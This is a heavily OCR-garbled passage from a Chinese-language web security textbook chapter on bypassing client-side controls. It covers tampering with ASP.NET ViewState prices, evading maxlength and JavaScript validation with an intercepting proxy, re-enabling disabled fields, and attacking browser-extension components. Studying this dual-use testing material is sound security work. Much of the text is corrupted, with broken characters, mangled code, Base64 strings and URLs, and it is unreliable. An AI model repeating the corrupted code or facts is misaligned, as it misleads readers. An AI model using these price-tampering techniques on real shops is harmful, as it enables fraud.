新 传送 它 的 值 ， 实 现 系 种 恶意 效果 。 例 如 ， 前 面 显示 的 表单 的 
pricing_token 参 数 中 可 能 包含 一 个 加 密 的 产品 价格 。 尽 管 攻击 者 无 
法 对 选择 的 任意 价格 以 相同 的 算法 进行 加 密 ， 但 是 ， 他 们 可 以 把 另 
一 个 更 加 便宜 的 产品 的 加 密 价 格 复制 过 来 ， 放 在 这 里 提交 。 

(4) 如 果 其 他 所 有 方法 全 都 无 效 ， 还 可 以 通过 提交 畸形 字符 
串 一 一 如 包含 超 长 值 、 不 同 字 符 集 等 错误 的 字符 串 一 一 尝试 攻击 负 
员 对 模糊 数据 进行 解密 或 去 模糊 处 理 的 服务 器 并 逻辑 。 














5.1.6 ASP.NET ViewState 


ASP.NET ViewState 是 一 种 通过 客户 端 传送 模糊 数据 的 常用 机 制 |。 
它 是 一 个 由 所 有 ASP.NET Web 应 用 程序 默认 创建 的 隐藏 字段 ， 其 中 包含 
关于 当前 页 面 状 态 的 序列 化 信息 。ASP.NET 平 台 使 用 ViewState 提 高 服务 
器 的 性 能 一 一 服务 器 通过 它 在 连续 提交 请 求 的 过 程 中 保存 用 户 界面 中 的 
元 素 ， 而 不 需要 在 服务 器 端 维护 所 有 相关 的 状态 信息 。 例 如 ， 服 务 器 会 
根据 用 户 提 交 的 参数 填充 下 拉 列 表 。 用 户 随后 提交 请 求 时 ， 浏 览 器 并 不 
向 服务 器 提交 列表 的 内 容 。 相 反 ， 浏 览 器 提交 隐藏 的 ViewState 字 段 ， 其 
中 包含 该 列表 的 序列 化 格式 。 然 后 ， 服 务 器 对 ViewState 进 行 去 序列 化 处 
理 ， 并 重新 建立 相同 的 列表 ， 再 将 其 返回 给 用 户 。 

除 这 种 核心 功能 外 ， 开 发 者 还 在 连续 提交 请 求 的 过 程 中 使 用 
ViewState 保 存 任意 信息 。 例 如 ， 应 用 程序 可 以 不 将 产品 价格 保存 在 隐藏 

















表单 字段 中 ， 而 是 将 其 保存 在 ViewState 中 ， 如 下 所 示 : 
string price = getPrice (prodno); 
ViewState.Add(“price”, price); 
返回 给 用 户 的 表单 如 下 所 示 : 
string price = getPrice(prodno}; 
ViewState.Add("price”, price); 


A Ge SCS IN, MRAKA Bio: 


<form method="post" action="Shop. aspx?prod=3"> 
<input type="hidden" name="__VIEWSTAT STATE 


p" 
E 
valuc="/wEPDwULLTE1ODcxNjkwNjIPFgIeBX83yaWNl1BQMZOT1kZA==" /> 


Product: HTC Avalanche <br/> 


id="__VIEWSTATE” 


Price: 399 <br/> 

Quantity: <input type="text" name="quantity’> (Maximum quantity is 
<br/> 

<input type="submit" value="Buy"> 


很 明显 ， 上 面 的 请 求 中 并 不 包含 产品 价格 只 有 订购 的 数量 和 模 
糊 处 理 后 的 ViewState 参 数 。 随 意 更 改 这 个 参数 会 导致 应 用 程序 显示 错误 
消息 ， 并 因此 终止 购买 交易 。 

ViewState 参 数 实 际 上 是 一 个 Base64 编 码 字 符 串 ， 用 户 可 以 轻松 对 这 
个 字符 串 进行 解码 ， 以 查看 其 代表 的 价格 参数 ， 如 下 所 示 : 


POST /shop/75/Shop.aspx?prod=3 HTTP/1.1 








Host: mdsec.net 
Content-Type: application/x-www-form-urlencoded 


Content-Length: 77 


VIEWSTATER=%2 PwEPDWULLTE1ODcxN 4 kwNj T PPo TeBXByaWNn 1 BOMZOTLKZAS 3 DESDE 


quantity=1 


VY 提示 ”在 对 一 个 可 能 为 Base64 编 码 的 字符 串 进行 解码 时 ， 
用 户 和 常常 会 犯 一 个 错误 ， 即 从 字符 串 的 错误 位 置 开始 解码 。 鉴 于 
Base64 编 码 的 特点 ， 如 果 从 错误 的 位 置 开 始 解码 ， 解 码 后 的 字符 串 
中 会 出 现 乱 码 。Base64 采 用 基于 数据 块 的 格式 ， 每 4 字 节 的 编码 数 
据 解 码 后 会 变 为 3 个 字 节 。 因 此 ， 如 果 解 码 后 的 Base64 字 符 吕 并 无 
意义 ， 请 尝试 从 编码 字符 串 中 的 4 个 相 邻 的 偏 移 值 位 置 开始 解码 。 


默认 情况 下 ，ASP.NET 平 台 通过 在 ViewState 中 加 入 一 个 密 钥 散 列 








《 称 为 MAC 保 护 〉 来 防止 算 改 。 但 是 ， 一 些 应 用 程序 禁用 了 这 项 默认 
启用 的 保护 ， 这 意味 着 攻击 人 员 可 以 修改 ViewState 的 值 ， 以 确定 其 是 否 
会 对 应 用 程序 的 服务 器 端 处 理 产 生 影 响 。 

Burp Proxy 提 供 一 个 指示 ViewState 是 否 受 MAC 保 护 的 ViewState 解 
析 堪 ， 如 图 5-3 所 示 。 如 果 ViewState 未 受到 保护 ， 则 攻击 人 员 可 以 使 用 
ViewState 树 下 的 十 六 进 制 编辑 器 在 Burp 中 编辑 ViewState 的 内 容 。 在 癌 
服务 器 或 客户 端 发 送 消息 时 ，Burp 将 发 送 经 过 更 新 的 ViewState， 有 具体 到 
前 面 的 示例 ， 这 样 就 可 以 更 改 购物 时 商品 的 价格 。 








burp suite professional ,器 -| 区 到 
ou nguda repemer window hop 

target proxy | spicer | scanner ntru epester | sequencer decode a alert 
intercept opbons usto 
requestto Mipimdsecnetso 11/21 

forward drop her copt is > 
wetate 
9 ViewState v2.0 compatible [MAC ts not enabled 
» Pale 
> Pal 
swing -1538714 { 
ẹ Pair 
P Lis 
string 
shing 3 
null 
null 

4 ry 
0 01 ) 有 158716906 
1 四 2 price 399 
9 64 dad 


图 5-3 ”如 果 未 设置 EnableViewStateMac 选 项 ，Burp Proxy 可 解码 并 显示 ViewState， 
允许 攻击 者 查看 其 内 容 并 对 它们 进行 编辑 












































A IF 


http://mdsec.net/shop/76/ 


渗透 测试 步 又 


(1) 如 果 要 攻击 ASP.NET 应 用 程序 ， 确 定 是 人 否 对 ViewState 启 
用 了 MAC 保 护 。 如 果 ViewState 结 构 末 尾 存 在 一 个 20 字 节 的 散 列 ， 

即 表示 应 用 程序 启用 了 MAC 保 护 。 可 以 使 用 Burp Suite 中 的 解析 器 
确定 上 述 散 列 是 否 存在 。 

(2) 即使 ViewState 受 到 保护 ， 还 可 以 解码 各 种 不 同 应 用 程序 
页 面 中 的 ViewState 参 数 ， 了 解 应 用 程序 是 否 使 用 ViewState 通 过 客 
户 端 传送 任何 敏感 数据 。 

(3) 淮 试 修改 ViewState 中 某 个 特殊 参数 的 值 ， 但 不 破坏 它 的 
结构 ， 看 看 是 否 会 导致 错误 消息 。 

(4) 如 果 能 够 修改 ViewState 而 不 会 造成 错误 ， 则 应 该 分 析 
ViewState 中 每 个 参数 的 功能 ， 以 及 应 用 程序 是 否 使 用 这 些 参数 保存 
任何 定制 数据 。 尝 试用 专门 设计 的 值 代 蔡 每 一 个 参数 ， 探 查 常见 的 
漏洞 ， 就 像 检查 通过 客户 端 传送 的 其 他 数据 项 一 样 。 

(5) 注意 ， 不 同 页 面 可 能 启用 或 禁用 MAC 保 护 ， 因 此 有 必要 
测试 应 用 程序 的 每 一 个 重要 页 面 ， 了 解 其 中 是 否 存在 ViewState 攻 击 
漏洞 。 如 果 在 局 用 被 动 扫 描 的 情况 下 使 用 Burp Scanner, Burp 将 自动 
报告 任何 使 用 ViewState 但 未 启用 MAC 保 护 的 页 面 。 











5.2 +1 数据: HTML £ 


应 用 程序 使 用 客户 端 控 件 限 制 客户 剖 提 交 的 数据 的 为 一 个 主要 控制 
对 象 ， 是 最 初 不 由 服务 器 指定 ， 而 是 由 洛 户 端 计算 机 自己 收集 的 数据 。 

HTML 表 单 是 一 种 最 简单 、 最 常用 的 机 制 ， 主 要 用 于 从 用 户 收 集 输 
入 并 将 其 提交 给 服务 器 。 用 户 在 已 命名 的 文本 字段 中 输入 数据 ， 再 将 它 
们 以 名 / 值 对 的 形式 提交 给 服务 器 ， 是 这 种 方法 的 最 基本 应 用 。 但 是 ， 
表单 还 有 其 他 用 法 ， 即 对 用 户 提 交 的 数据 施加 限制 或 执行 确认 检查 。 当 
应 用 程序 使 用 这 些 客户 端 控 件 作 为 安全 机 制 ， 防 御 恶 意 输 入 时 ， 攻 击 者 
通常 能 够 轻易 避 开 这 些 控件 ， 致 使 应 用 程序 非常 易于 受到 攻击 。 


5.2.1 Ie BR til 
下 面 对 本 章 开 头 部 分 的 HITML 表 单 稍 作 修改 ， 规 定 quantity 字 段 的 最 
KREAI: 


<form method="post" action-"Shon.aspx?prod-1"> 





Product: iPhone 5 <br/> 


Price: 449 <br/> 


Quantity: <input type="text" name="quantity" maxlength="1"> <br/> 
<input type="hidden" name="“price" value="449"> 

<input type="submit" value="Buy"> 

</form> 
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是 ， 通 过 拦截 提交 表单 的 请 求 ， 并 在 其 中 输入 任意 值 ， 或 拦截 包含 表单 
的 啊 应 ， 并 删除 maxlength 属 性 ， 束 可 以 轻易 避 开 这 种 限制 。 


拦截 啊 应 


试图 拦截 并 修改 服务 器 啊 应 时 ， 攻 击 者 可 能 发 现代 理 服务 吉星 
示 以 下 相关 消息 。 


HTTP/1.1 304 Not Modified 

Date: Wed, 6 Jul 2011 22:40:20 GMT 
Etag: “6c7-5fcc0900” 

Expires: Thu, 7 Jul 2011 00:40:20 GMT 
Cache-Control: max-age=7200 


产生 这 个 响应 是 因为 浏览 器 已 经 在 缓存 中 保存 了 所 请 求 资 源 的 
副本 。 当 浏览 器 请 求 一 个 已 存 入 缓存 的 资源 时 ， 它 通 名 会 在 请 求 中 
添加 另外 两 个 消息 头 ， 分 别 为 If-Modified-Since 和 If-None-Match 消 
Kk, wW FER: 








GET /scripts/validate.js HTTP/1.1 

Host: wahh-app.com 

If-Modified-Since: Sat, 7 Jul 2011 19:48:20 GMT 
If-None-Match: “6c7-5fcc0900” 


这 些 消 息 头 告 诉 服务 右 浏 览 器 上 次 更 新 缓存 副本 的 时 间 。 Etag 
字符 串 (由 服务 器 随 资源 副本 一 起 提供 〉 是 一 种 序列 写 ， 服 务 器 为 

每 个 可 缓存 的 资源 分 配 一 个 Etag， 如 果 资 源 被 修改 ， 它 也 会 随 之 更 
新 。 如 果 服 务 器 拥有 比 If-Modified-Since 消 息 头 中 指定 日 期 更 新 的 
资源 ， 或 者 如 果 当 前 版 本 的 Etag 与 INone-Match 消 息 头 中 指定 的 
Etag 不 匹配 ， 那 么 服务 器 就 会 在 啊 应 中 提供 最 新 的 资源 。 人 否则， 苹 
将 返回 和 本 例 相 同 的 304 响 应 ， 通 知 浏览 资源 没有 被 修改 ， 浏览 
器 应 使 用 绥 存 中 的 副本 。 

如 果 是 这 样 ， 必 须 拦截 并 修改 浏览 器 保存 在 绥 存 中 的 资源 ， 可 
以 拦截 相关 请 求 并 删除 Hf-Modified-Since 和 If-None-Match 消 息 头 ， 
让 服务 器 在 啊 应 中 提供 所 请 求 资源 的 完整 版 本 。Burp Proxy 中 有 一 
个 从 每 个 请 求 中 删除 这 些 消 恩 涉 的 选项 ， 可 和 窗 新 由 浏览 器 发 送 的 所 





有 绥 存 信息 。 


渗透 测试 步 又 


(1) 寻找 包含 maxlength 属 性 的 表单 元 素 。 提 交大 于 这 个 长 度 
ee 〈 例 如， 如果 应 用 程序 要 求 数 字 ， 则 提交 一 
上 数值 ) 。 

(2) 如 果 应 用 程序 接受 这 个 超 长 的 数据 ， 则 可 以 据 此 推断 出 
服务 器 并 没有 采用 客户 端 确 认 机 制 。 

(3) 根据 应 用 程序 随后 对 参数 进行 的 处 理 ， 可 以 通过 确认 机 
制 中 存在 的 缺陷 利用 其 他 漏洞 ， 如 SQL 注入 、 跨 站 点 脚本 或 缓冲 区 


Äi HH o 





5.2.2 TA JAL 


HTML 表单 内 置 的 输入 确认 机 制 极其 简单 ， 而 且 不 够 详细 ， 不 足以 
对 各 种 输入 执行 相关 确认 。 例 如 ， 用 户 注 册 表 单 中 可 能 包含 姓名 、 电 子 
邮件 地 址 、 电 话 号 码 和 邮政 编码 字段 ， 所 有 这 些 字 段 都 要 求 不 同 的 输 
入 。 因 此 ， 开 发 者 通 闻 在 脚本 中 执行 定制 的 客户 端 输入 确认 。 下 面 对 本 
章 开 头 的 示例 进行 一 些 修改 ， 以 说 明 这 个 问题 : 


<form method="post” action="Shop.aspx?prod=2" onsubmit="return 
valicateForm({this) "> 

Preduct: Samsung Multiverse <br/> 

Price: 399 <br/> 

Quantity: <input type="text" name="quantity"> (Maximum quantity is 50) 
<br/> 

<input type="submit" value="Buy"> 

</form> 


<script>function validateForm(theForm) 
{ 
var isInteger = /*\d+$/; 
var valid = isInteger.test (quantity) && 
quantity > 0 && quantity <= 50; 
if (!valid) 
alert ('Please enter a valid quantity'); 
return valid; 
} 


ʻ 


</script> 
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笑 试 访问 
http://mdsec.net/shop/139/ 


form 标 签 的 onsubmit 属 性 指示 浏览 器 在 用 户 单 击 “ 提 交 ” 按 钮 时 运行 
ValidateForm 疯 数 ， 并 且 只 有 在 该 函数 返回 “ 真 ” 时 才 提 交 表 单 。 这 种 机 
制 帮 助 客户 端 阻止 提交 表单 的 企图 ， 对 用 户 的 输入 执行 定制 的 确认 检 
查 ， 进 而 决定 是 否 接受 该 输入 。 上 面 示例 中 采用 的 确认 机 制 极其 简单 ， 
只 检查 在 amout 字 段 中 输入 的 数据 是 否 为 介 于 1 到 50 之 间 的 整数 。 

这 种 类 型 的 客户 问 控 制 非常 容易 解除 ， 但 通常 足以 禁用 浏览 器 中 的 
JavaScript。 如 果 是 这 样 ， 并 且 忽 略 onsubmit 属 性 ， 那 么 ， 不 需要 任何 定 
制 确认 就 可 以 提交 表单 。 

但 是 ， 如 果 应 用 程序 依靠 客户 问 脚 本 执行 正常 操作 “〈 如 构造 部 分 用 
户 界面 ) ， 完 全 禁用 JavaScript 可 能 会 终止 应 用 程序 。 男 一 种 更 加 合理 的 
办 法 是 在 浏览 器 的 输入 字段 中 输入 一 个 民 性 (已 知 无 恶意 ) 值 ， 然 后 用 
代理 服务 器 拦截 确认 后 提交 的 表单 ， 并 将 其 中 的 数据 修改 成 想 要 的 值 。 
通常 ， 这 是 解除 基于 JavaScript 的 确认 的 最 简单 有 效 的 方法 。 

另外 ， 可 以 拦截 包含 JavaScript 确 认 程 序 〈validation routine) 的 服 
务 器 啊 应 ， 修 改 其 脚本 使 其 失效 一 一 在 前 面 的 示例 中 ， 更 改 每 一 个 
ValidateForm 函 数 使 其 返回 “ 真 ? 即 可 。 














渗透 测试 步 又 


i (1) 确定 任何 在 提交 表单 前 使 用 客户 端 JavaScript 进 行 输入 确 
认 的 情况 。 
(2) 通过 修改 所 提交 的 请 求 ， 在 其 中 插入 无 效 数据 ， 或 修改 
确认 代码 使 其 失效 ， 癌 服务 器 提交 确认 机 制 通 常会 阻止 的 数据 。 
(3) 与 长 度 限 制 一 样 ， 确 定 服务 器 是 否 采 用 了 和 客户 端 相同 
a a a 


(4) 注意 ， 如 果 在 提交 表单 前 有 几 个 输入 字段 需要 由 客户 端 
确认 机 制 检验 ， 需 要 分 别 用 无 效 数 据 测试 每 一 个 字段 ， 同 时 在 所 有 
其 他 字段 中 使 用 有 效 数据 。 如 果 同 时 在 几 个 字段 中 提交 无 效 数 据 ， 
可 能 服务 器 在 识别 出 第 一 个 无 效 字 段 时 就 已 经 集 止 执行 表单 ， 从 而 
使 测试 无 法 到 达 应 用 程序 的 所 有 可 能 代码 路 径 。 














= 
SA 
=> 注解 ”使 用 客户 端 JavaScript 程 序 确 认 用 户 输入 的 做 法 在 
Web 应 用 程 友 中 非常 普遍 ， 但 这 并 不 表示 这 种 应 用 程序 全 部 易于 但 
受 攻击 。 只 有 当 服 务 器 并 未 采用 和 客户 端 相同 的 确认 机 制 ， 以 及 能 
够 避 开 客户 端 确 认 的 专门 设计 的 输入 可 在 应 用 程序 中 造成 菜 种 无 法 
预料 的 行为 时 ， 应 用 程序 才 存 在 风险 。 

在 绝 大 多 数 情况 下 ， 在 客户 端 确 认 用 户 输入 有 助 于 提高 应 用 程 
序 的 性 能 ， 改 善 用 尸体 验 。 例 如 ， 在 填写 详细 的 注册 表单 时 ， 普 通 
用 户 可 能 会 犯 许多 错误 ， 如 忽略 必要 的 字段 或 电话 号 码 格式 出 现 错 
误 。 如 宋 不 采用 客户 端 硝 认 机 制 ， 更 正 这 些 错误 可 能 需要 多 次 加 载 
注册 页 面 ， 反 复 同 服务 器 传送 消 电 。 在 客户 端 执行 基本 的 确认 检查 
可 使 用 户 体验 更 佳 ， 减 轻 服 务 器 的 负担 。 














5.2.3 ”禁用 的 元 紊 


如 果 HTML 表 单 中 的 一 个 元 素 标记 为 禁用 ， 它 会 在 屏幕 上 出 现 ， 但 
以 灰色 显示 ， 并 且 无 法 像 常规 控件 那样 编辑 或 使 用 。 而 且 ， 提 交 表 单 
时 ， 表 单 也 不 向 服务 句 传 送 这 个 元 素 。 以 下 面 的 表单 为 例 : 


<form method="post" action="Shop.aspx?prod=5"> 

Product: Blackberry Rude <br/> 

Price: <input type="text" disabled="true" name="price" value="299"> 
<br/> 


Quantity: <input type="text" name="quantity"> (Maximum quantity is 50} 


这 个 表单 中 的 产品 价格 位 于 禁用 的 文本 字段 中 ， 并 出 现在 屏幕 上 ， 
如 图 5-4 所 示 。 


(Mzximum quanczity is 50° 





图 5-4 包含 禁用 的 输入 字段 的 表单 





提交 该 表单 时 ， 应 用 程序 只 癌 服 务 器 传送 quantity 参 数 。 但 是 ， 存 
在 禁用 字段 表示 应 用 程序 最 初 可 能 已 经 使 用 过 price 参 数 〈 可 能 在 开发 阶 
段 用 于 测试 目的 ) 。 这 个 参数 很 可 能 已 经 提交 给 服务 器 并 经 过 应 用 程序 
处 理 了 。 在 这 种 情况 下 ， 应 当 测 试 服务 需 端 应 用 程序 是 否 仍然 会 处 理 这 
个 参数 。 如 果 确 实 如 此 ， 可 以 尝试 对 这 种 情况 加 以 利用 。 
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渗透 测试 步 又 


(1) 在 应 用 程序 的 每 一 个 表单 中 寻找 禁用 的 元 素 。 尝 试 将 发 

2 i oe pent gee 确定 其 是 个 
RX o 

(2) 通常 ， 如 果 提 交 元 素 被 标记 为 禁用 ， 其 按钮 即 以 灰色 显 
示 ， 表 示 相 关 操 作 无 效 。 这 时 应 该 尝试 提交 这 些 元 素 的 名 称 ， 确 定 
应 用 程序 是 否 在 执行 所 请 求 的 操作 前 执行 服务 器 端 检查 。 

(32) 注意 ， 在 提交 表单 时 ， 浏 览 器 并 不 包含 禁用 的 表单 元 
Fas 因此 ， 仅 仅 通过 浏览 应 用 程序 的 功能 以 及 监控 由 浏览 句 发 布 的 
请 求 并 不 能 确定 其 中 是 否 含有 禁用 的 元 素 。 要 确定 禁用 的 元 素 ， 必 
须 监控 服务 器 的 啊 应 或 在 浏览 器 中 查看 页 面 来 源 。 

(4) 还 可 以 使 用 Burp Proxy 中 的 HTML 修 改 功 能 目 动 重新 启用 
应 用 程序 中 的 任何 禁用 的 字段 。 


























除 HITML 表 单 外 ， 另 一 种 收集 、 确 认 并 提交 用 户 数据 的 主要 方法 是 
使 用 在 浏览 器 扩展 中 运行 的 客户 端 组 件 〈 如 Java 或 Flash) 。 最 初 用 于 
Web 应 用 程序 时 ， 浏览 器 扩展 通常 用 于 执行 简单 而 基本 的 任务 。 ws, 
己 经 有 越 来 越 多 的 公司 使 用 浏览 器 扩展 来 创建 功能 强大 的 客户 eee 
这 些 组 件 在 浏览 器 中 运行 ， 跨 越 多 个 客户 端 平 台 ， G 
灵活 性 ， 并 与 桌面 应 用 程序 协作 。 使 用 浏览 器 扩展 的 一 个 副作用 是 : a 
于 染 度 和 用 户 体验 方面 的 原因 ， 之 前 在 服务 器 上 执行 的 处 理 任务 现 硅 将 
在 客户 端 完成 。 对 某 些 应 用 程序 “如 网 上 交易 应 用 程序 ) 而 言 ， 速 度 至 
关 重 要 ， 因 此 ， 许 多 关键 的 应 用 程序 任务 需要 在 客户 端 完成 。 
速度 ， 在 开发 应 用 程序 时 可 能 需要 “有 意 ” 以 牺牲 安全 为 代价 ， 可 能 是 
因为 开发 者 误 以 为 交易 者 全 都 是 可 信用 户 ， 或 者 浏览 个 扩展 会 自行 防 条 
恶意 企图 。 但 是 ， 如 我 们 在 第 2 章 以 及 本 章 前 面部 分 讨论 核心 安全 问题 
时 所 述 ， 客 户 端 组 件 不 可 能 为 自己 的 业务 逻辑 提供 防御 。 

浏览 器 扩展 可 以 通过 输入 表单 、 或 者 在 某 些 情况 下 通过 与 客户 端 操 
作 系 统 的 文件 系统 或 注册 表 交 互 ， 以 各 种 不 同 的 方式 收集 数据 。 在 将 收 
集 到 的 数据 提交 给 服务 器 之 前 ， 它 们 可 以 对 这 些 数据 执行 任何 复杂 的 确 
认 和 处 理 。 而 且 ， 由 于 它们 的 内 部 工作 机 制 与 HTML 表 单 和 JavaScript 相 
比 更 加 不 透明 ， 开 发 者 认为 它们 执行 的 确认 更 加 难以 役 避 。 为 此 ， 通 过 
浏览 器 扩展 查找 Web 应 用 程序 中 存在 的 漏洞 往往 能 够 获得 更 大 的 成 果 。 

赌博 组 件 是 应 用 客户 端 控件 的 典型 浏览 器 扩展 。 如 前 所 述 ， 客 户 端 
控件 并 不 可 靠 ， 因 此 ， 如 果 使 用 在 潜在 攻击 者 的 机 器 上 本 地 运行 的 浏览 
器 扩展 来 执行 在 线 赌博 应 用 程序 ， 这 种 做 法 将 非常 具有 诱惑 力 。 如 果 游 
戏 的 任何 一 个 部 分 由 客户 端 而 非 服务 器 控制 ， 攻 击 者 就 可 以 非常 精确 地 
对 游戏 进行 控制 ， 以 提高 获胜 机 率 、 改 变 规 则 、 或 更 改 返回 给 服务 器 的 
得 分 。 这 种 情况 将 导致 以 下 几 种 攻击 。 

口 可 能 会 使 用 客户 端 组 件 来 维护 游戏 状态 。 这 时 ， 攻 击 者 就 可 以 在 
本 地 算 改 游戏 状态 ， 从 而 在 游戏 中 获得 优势 。 
口 攻 击 者 能 够 避 开 客户 端 控件 ， 并 执行 非法 操作 ， 以 在 游戏 中 获得 


口 攻击 者 能 够 发 现 隐 藏 的 功能 、 参 数 或 资源 ， 一 旦 调用 这 些 功能 
参数 或 资源 ， 攻 击 者 将 可 以 非法 访问 服务 器 端 资源 。 
口 如 果 游 戏 中 还 有 其 他 玩家 ， 客 户 端 组 件 可 能 会 接收 并 处 理 其 他 玩 
































家 的 信息 ， 攻 击 者 获知 这 些 信息 就 能 够 在 游戏 中 获得 优势 。 





常见 的 浏览 器 扩展 技术 包括 Java applet、Flash 和 Silverlight。 由 于 这 
些 技 术 的 用 途 基本 相同 ， 因 此 ， 它 们 也 提供 类 似 的 安全 功能 : 

口 它 们 均 编 译 成 中 间 字 节 码 ; 

口 它 们 在 提供 沙 使 执 行 环 境 的 虚拟 机 中 运行 ; 

口 它 们 可 能 会 使 用 远程 框架 ， 这 类 框架 采用 序列 化 来 传输 复杂 数据 
结构 ， 或 通过 HTTP 传 送 对 象 。 

1. Java 

Java applet 在 Java 虚 拟 机 (JVM) 中 运行 ， 并 采用 由 Java 安 全 策略 应 
用 的 沙 合 。 因 为 Java 在 Web 发 展 的 早期 就 已 存在 ， 并 且 其 核心 概念 仍 基 
本 不 变 ， 因 此 ， 有 大 量 知识 和 工具 可 用 于 对 Java applet 实 施 攻 击 或 进行 
防御 (如 本 章 后 面部 分 所 述 〉。 

2. Flash 

Flash 对 象 在 Flash 虚 拟 机 中 运行 。 和 Java applet 一 样 ，Flash 也 要 在 主 
机 上 的 沙 盒 中 运行 。 此 前 ，Flash 主 要 用 于 传送 动画 内 容 。 但 随 着 较 新 版 
本 的 ActionScript 的 推出 ， 现 在 Flash 已 经 能 够 传送 成 熟 的 桌面 应 用 程 
序 。Flash 最 近 的 主要 更 新 为 ActionScript 3 以 及 采用 动作 信息 格式 
CAMF) 序列 化 的 远程 功能 。 

3. Silverlight 

Silverlight 是 微软 开发 的 与 Flash 类 似 的 产品 。 同 样 ， 该 产品 主要 用 
于 启动 各 种 桌面 应 用 程序 ， 允 许 Web 应 用 程序 在 浏览 器 内 的 沙 盒 环 境 中 
提供 精简 的 .NET 体 验 。 从 技术 上 讲 ， 任 何 兼容 .NEI 的 语言 ， 从 C# 到 
Python， 都 可 用 于 开发 Silverlight， 但 C# 是 开发 Silverlight 最 常用 的 语 
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针对 使 用 浏览 器 扩展 组 件 的 应 用 程序 实施 攻击 时 ， 需 要 采用 以 下 两 
种 第 用 的 技巧 。 

首先 ， 可 以 拦截 并 修改 浏览 器 扩展 组 件 提 出 的 请 求 及 服务 如 的 啊 
应 。 在 许多 情况 下 ， 这 是 对 浏览 占 扩 展 组 件 进行 测试 的 最 简 蛙 也 是 最 快 
速 的 方法 ， 但 这 时 你 可 能 会 遇 到 各 种 限制 。 正 在 传输 的 数据 可 能 经 过 模 
糊 处 理 或 加 密 ， 或 者 使 用 专门 针对 所 用 技术 的 方案 进行 了 序列 化 。 仅 仪 
查看 组 件 生成 的 流量 ， 可 能 会 急 略 一 些 关 键 的 功能 或 业务 逻辑 ， 而 这 些 
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截 代 理 服务 占 时 也 可 能 会 遇 到 障碍 ， 但 是 ， 通 第 情况 下 ， 通 过 仔细 配置 
(如 本 章 后 面部 分 所 述 ) ， 完 全 可 以 克服 这 些 障 碍 。 

其 次 ， 可 以 直接 针对 组 件 实施 攻击 ， 并 答 试 反 编 译 它 的 字 布 码 ， 以 
查看 其 源 代 码 ; 或 者 使 用 调试 器 与 组 件 进行 动态 交互 。 这 种 方法 的 优点 
人 在于， 如 果 进 行 得 非常 彻 原 的话 ， 将 能 够 确定 组 件 支 持 或 引用 的 所 有 功 
能 。 还 能 修改 组 件 癌 服务 器 提交 的 请 求 中 的 关键 数据 ， 而 无 论 这 些 数 据 
采用 何 种 模糊 处 理 或 加 密 机 制 。 其 缺点 在 于 ， 这 种 方法 可 能 相当 费时 ， 














并 且 需 要 深入 了 解 浏 览 器 扩展 组 件 所 使 用 的 技术 和 编程 语言 。 
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许多 时 候 ， 最 好 是 结合 使 用 上 述 两 种 技巧 。 下 面 我 们 详细 介绍 这 种 
Tjo 





如 果 浏 览 器 已 配置 为 使 用 拦截 代理 服务 器 ， 并 且 应 用 程序 使 用 浏览 
器 扩展 加 载 客户 端 组 件 ， 这 时 ， 该 组 件 提出 的 请 求 将 经 过 代理 服务 器 。 
在 东 些 情况 下 ， 这 时 惑 可 以 开始 测试 相关 功能 ， 因 为 攻击 者 能 够 以 常规 
方式 拦截 并 修改 组 件 提出 的 请 求 。 

在 需要 避 开 在 浏览 右 扩 展 中 实施 的 客户 站 输入 确认 的 情况 下 ， 如 果 
组 件 以 透明 方式 向 服务 器 提供 经 过 确认 的 数据 ， 那 么 ， 如 5.2 市 所 述 ， 
可 以 使 用 拦截 代理 服务 器 修改 这 些 数据 。 例 如 ， 文 持 身 份 验证 机 制 的 浏 
览 锅 扩展 可 能 会 收集 用 户 证 蔬 ， 并 对 这 些 证 书 进行 确认 ， 然 后 在 请 求 中 
以 明文 参数 的 形式 向 服务 器 提交 这 些 证 书 。 这 时 ， 攻 击 者 不 需要 对 组 件 
本 刁 进 行 任何 分 析 或 攻击 ， 惑 可 以 轻松 解除 这 种 确认 。 

在 其 他 情况 下 ， 测 试 浏览 右 扩 展 组 件 可 能 会 遇 到 各 种 障碍 。 以 下 几 
市 将 讨论 这 些 问 题 。 

1. 处 理 序 列 化 数据 

应 用 程序 可 能 会 首先 对 数据 或 对 象 进行 序列 化 处 理 ， 然 后 再 通过 
HTTP 请 求 传送 这 些 数 据 或 对 象 。 当 然 ， 通 过 检查 原始 的 序列 化 数据 ， 
可 以 解 译 一 些 基于 字符 串 的 数据 ， 但 是 ， 通 常 而 言 ， 需 要 对 序列 化 数据 
进行 解压 缩 才 能 了 解 这 些 数据 。 如 采 和 希望 修改 这 些 数 据 ， 以 破坏 应 用 程 
序 的 处 理 过 程 ， 首 先 ， 需 要 解压 纵 序 列 化 内 容 ， 对 其 进行 必要 的 编辑 ， 
然后 重新 对 其 进行 序列 化 处 理 。 几 乎 可 以 肯定 ， 直 接 编 辑 原 始 的 序列 化 
数据 将 破坏 其 格式 ， 并 在 应 用 程序 处 理 请 求 时 导致 解析 错误 。 

每 种 浏览 右 扩 展 技术 都 具有 各 目 处 理 HHTTP 消 息 中 数据 的 序列 化 
方案 。 因 此 ， 通 第 渗透 测试 员 可 以 根据 所 采用 的 客 尸 端 组 件 推断 出 相关 
数据 的 序列 化 格式 ， 但 是 ， 任 何 时 候 ， 仔 细 检 查 相 关 HITP 消 息 才 能 确 














认 序 列 化 格式 。 
è Java 序列 化 
Java t a AR LENKA, mH, Java applet 可 能 会 以 这 种 方 
式 在 客户 端 与 服务 器 应 用 程序 组 件 之 间 传 送 序列 化 数据 结构 。 通 常 ， 包 
含 序列 化 Java 对 象 的 消 恩 很 容易 辨别 ， 因 为 它们 使 用 以 下 Content-Type 


消息 头 : 








Content-Type: application/x-java-serialized-object 
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数据 进行 去 序列 化 处 理 ， 以 查看 其 中 包含 的 原 语 数据 项 。 

Dseræ Burp Suite 中 的 一 个 有 用 插件 ， 该 插件 提供 一 个 框 染 ， 可 用 于 
碍 看 和 处 理 Burp 拦 截 的 序列 化 Java 对 象 。 该 工具 将 拦截 到 的 对 象 中 的 原 
语 数据 转换 为 XML 格式 ， 以 便于 进行 编辑 。 编 辑 相关 数据 后 ，Dser 将 重 
新 对 对 象 进行 序列 化 ， 并 对 HTTP 请 求 进行 相应 的 更 新 。 

可 以 在 以 下 URL 下 载 Dser 并 详细 了 解 它 的 运行 机 制 : 








hito:/ /biog.andlabs.org/2019/09/re-visiting-java-de-serialization-it .htm) 


SG Flash 序 列 化 

Flash 使 用 自己 的 可 用 于 在 服务 器 和 客户 端 组 件 之 间 传 输 复 杂 数 据 结 
构 的 序列 化 格式 。 通 消 ， 可 以 通过 以 下 Content-Type 消 息 头 辨别 动作 信 
息 格 式 CAME) : 


Content-Type: application/x-amf 


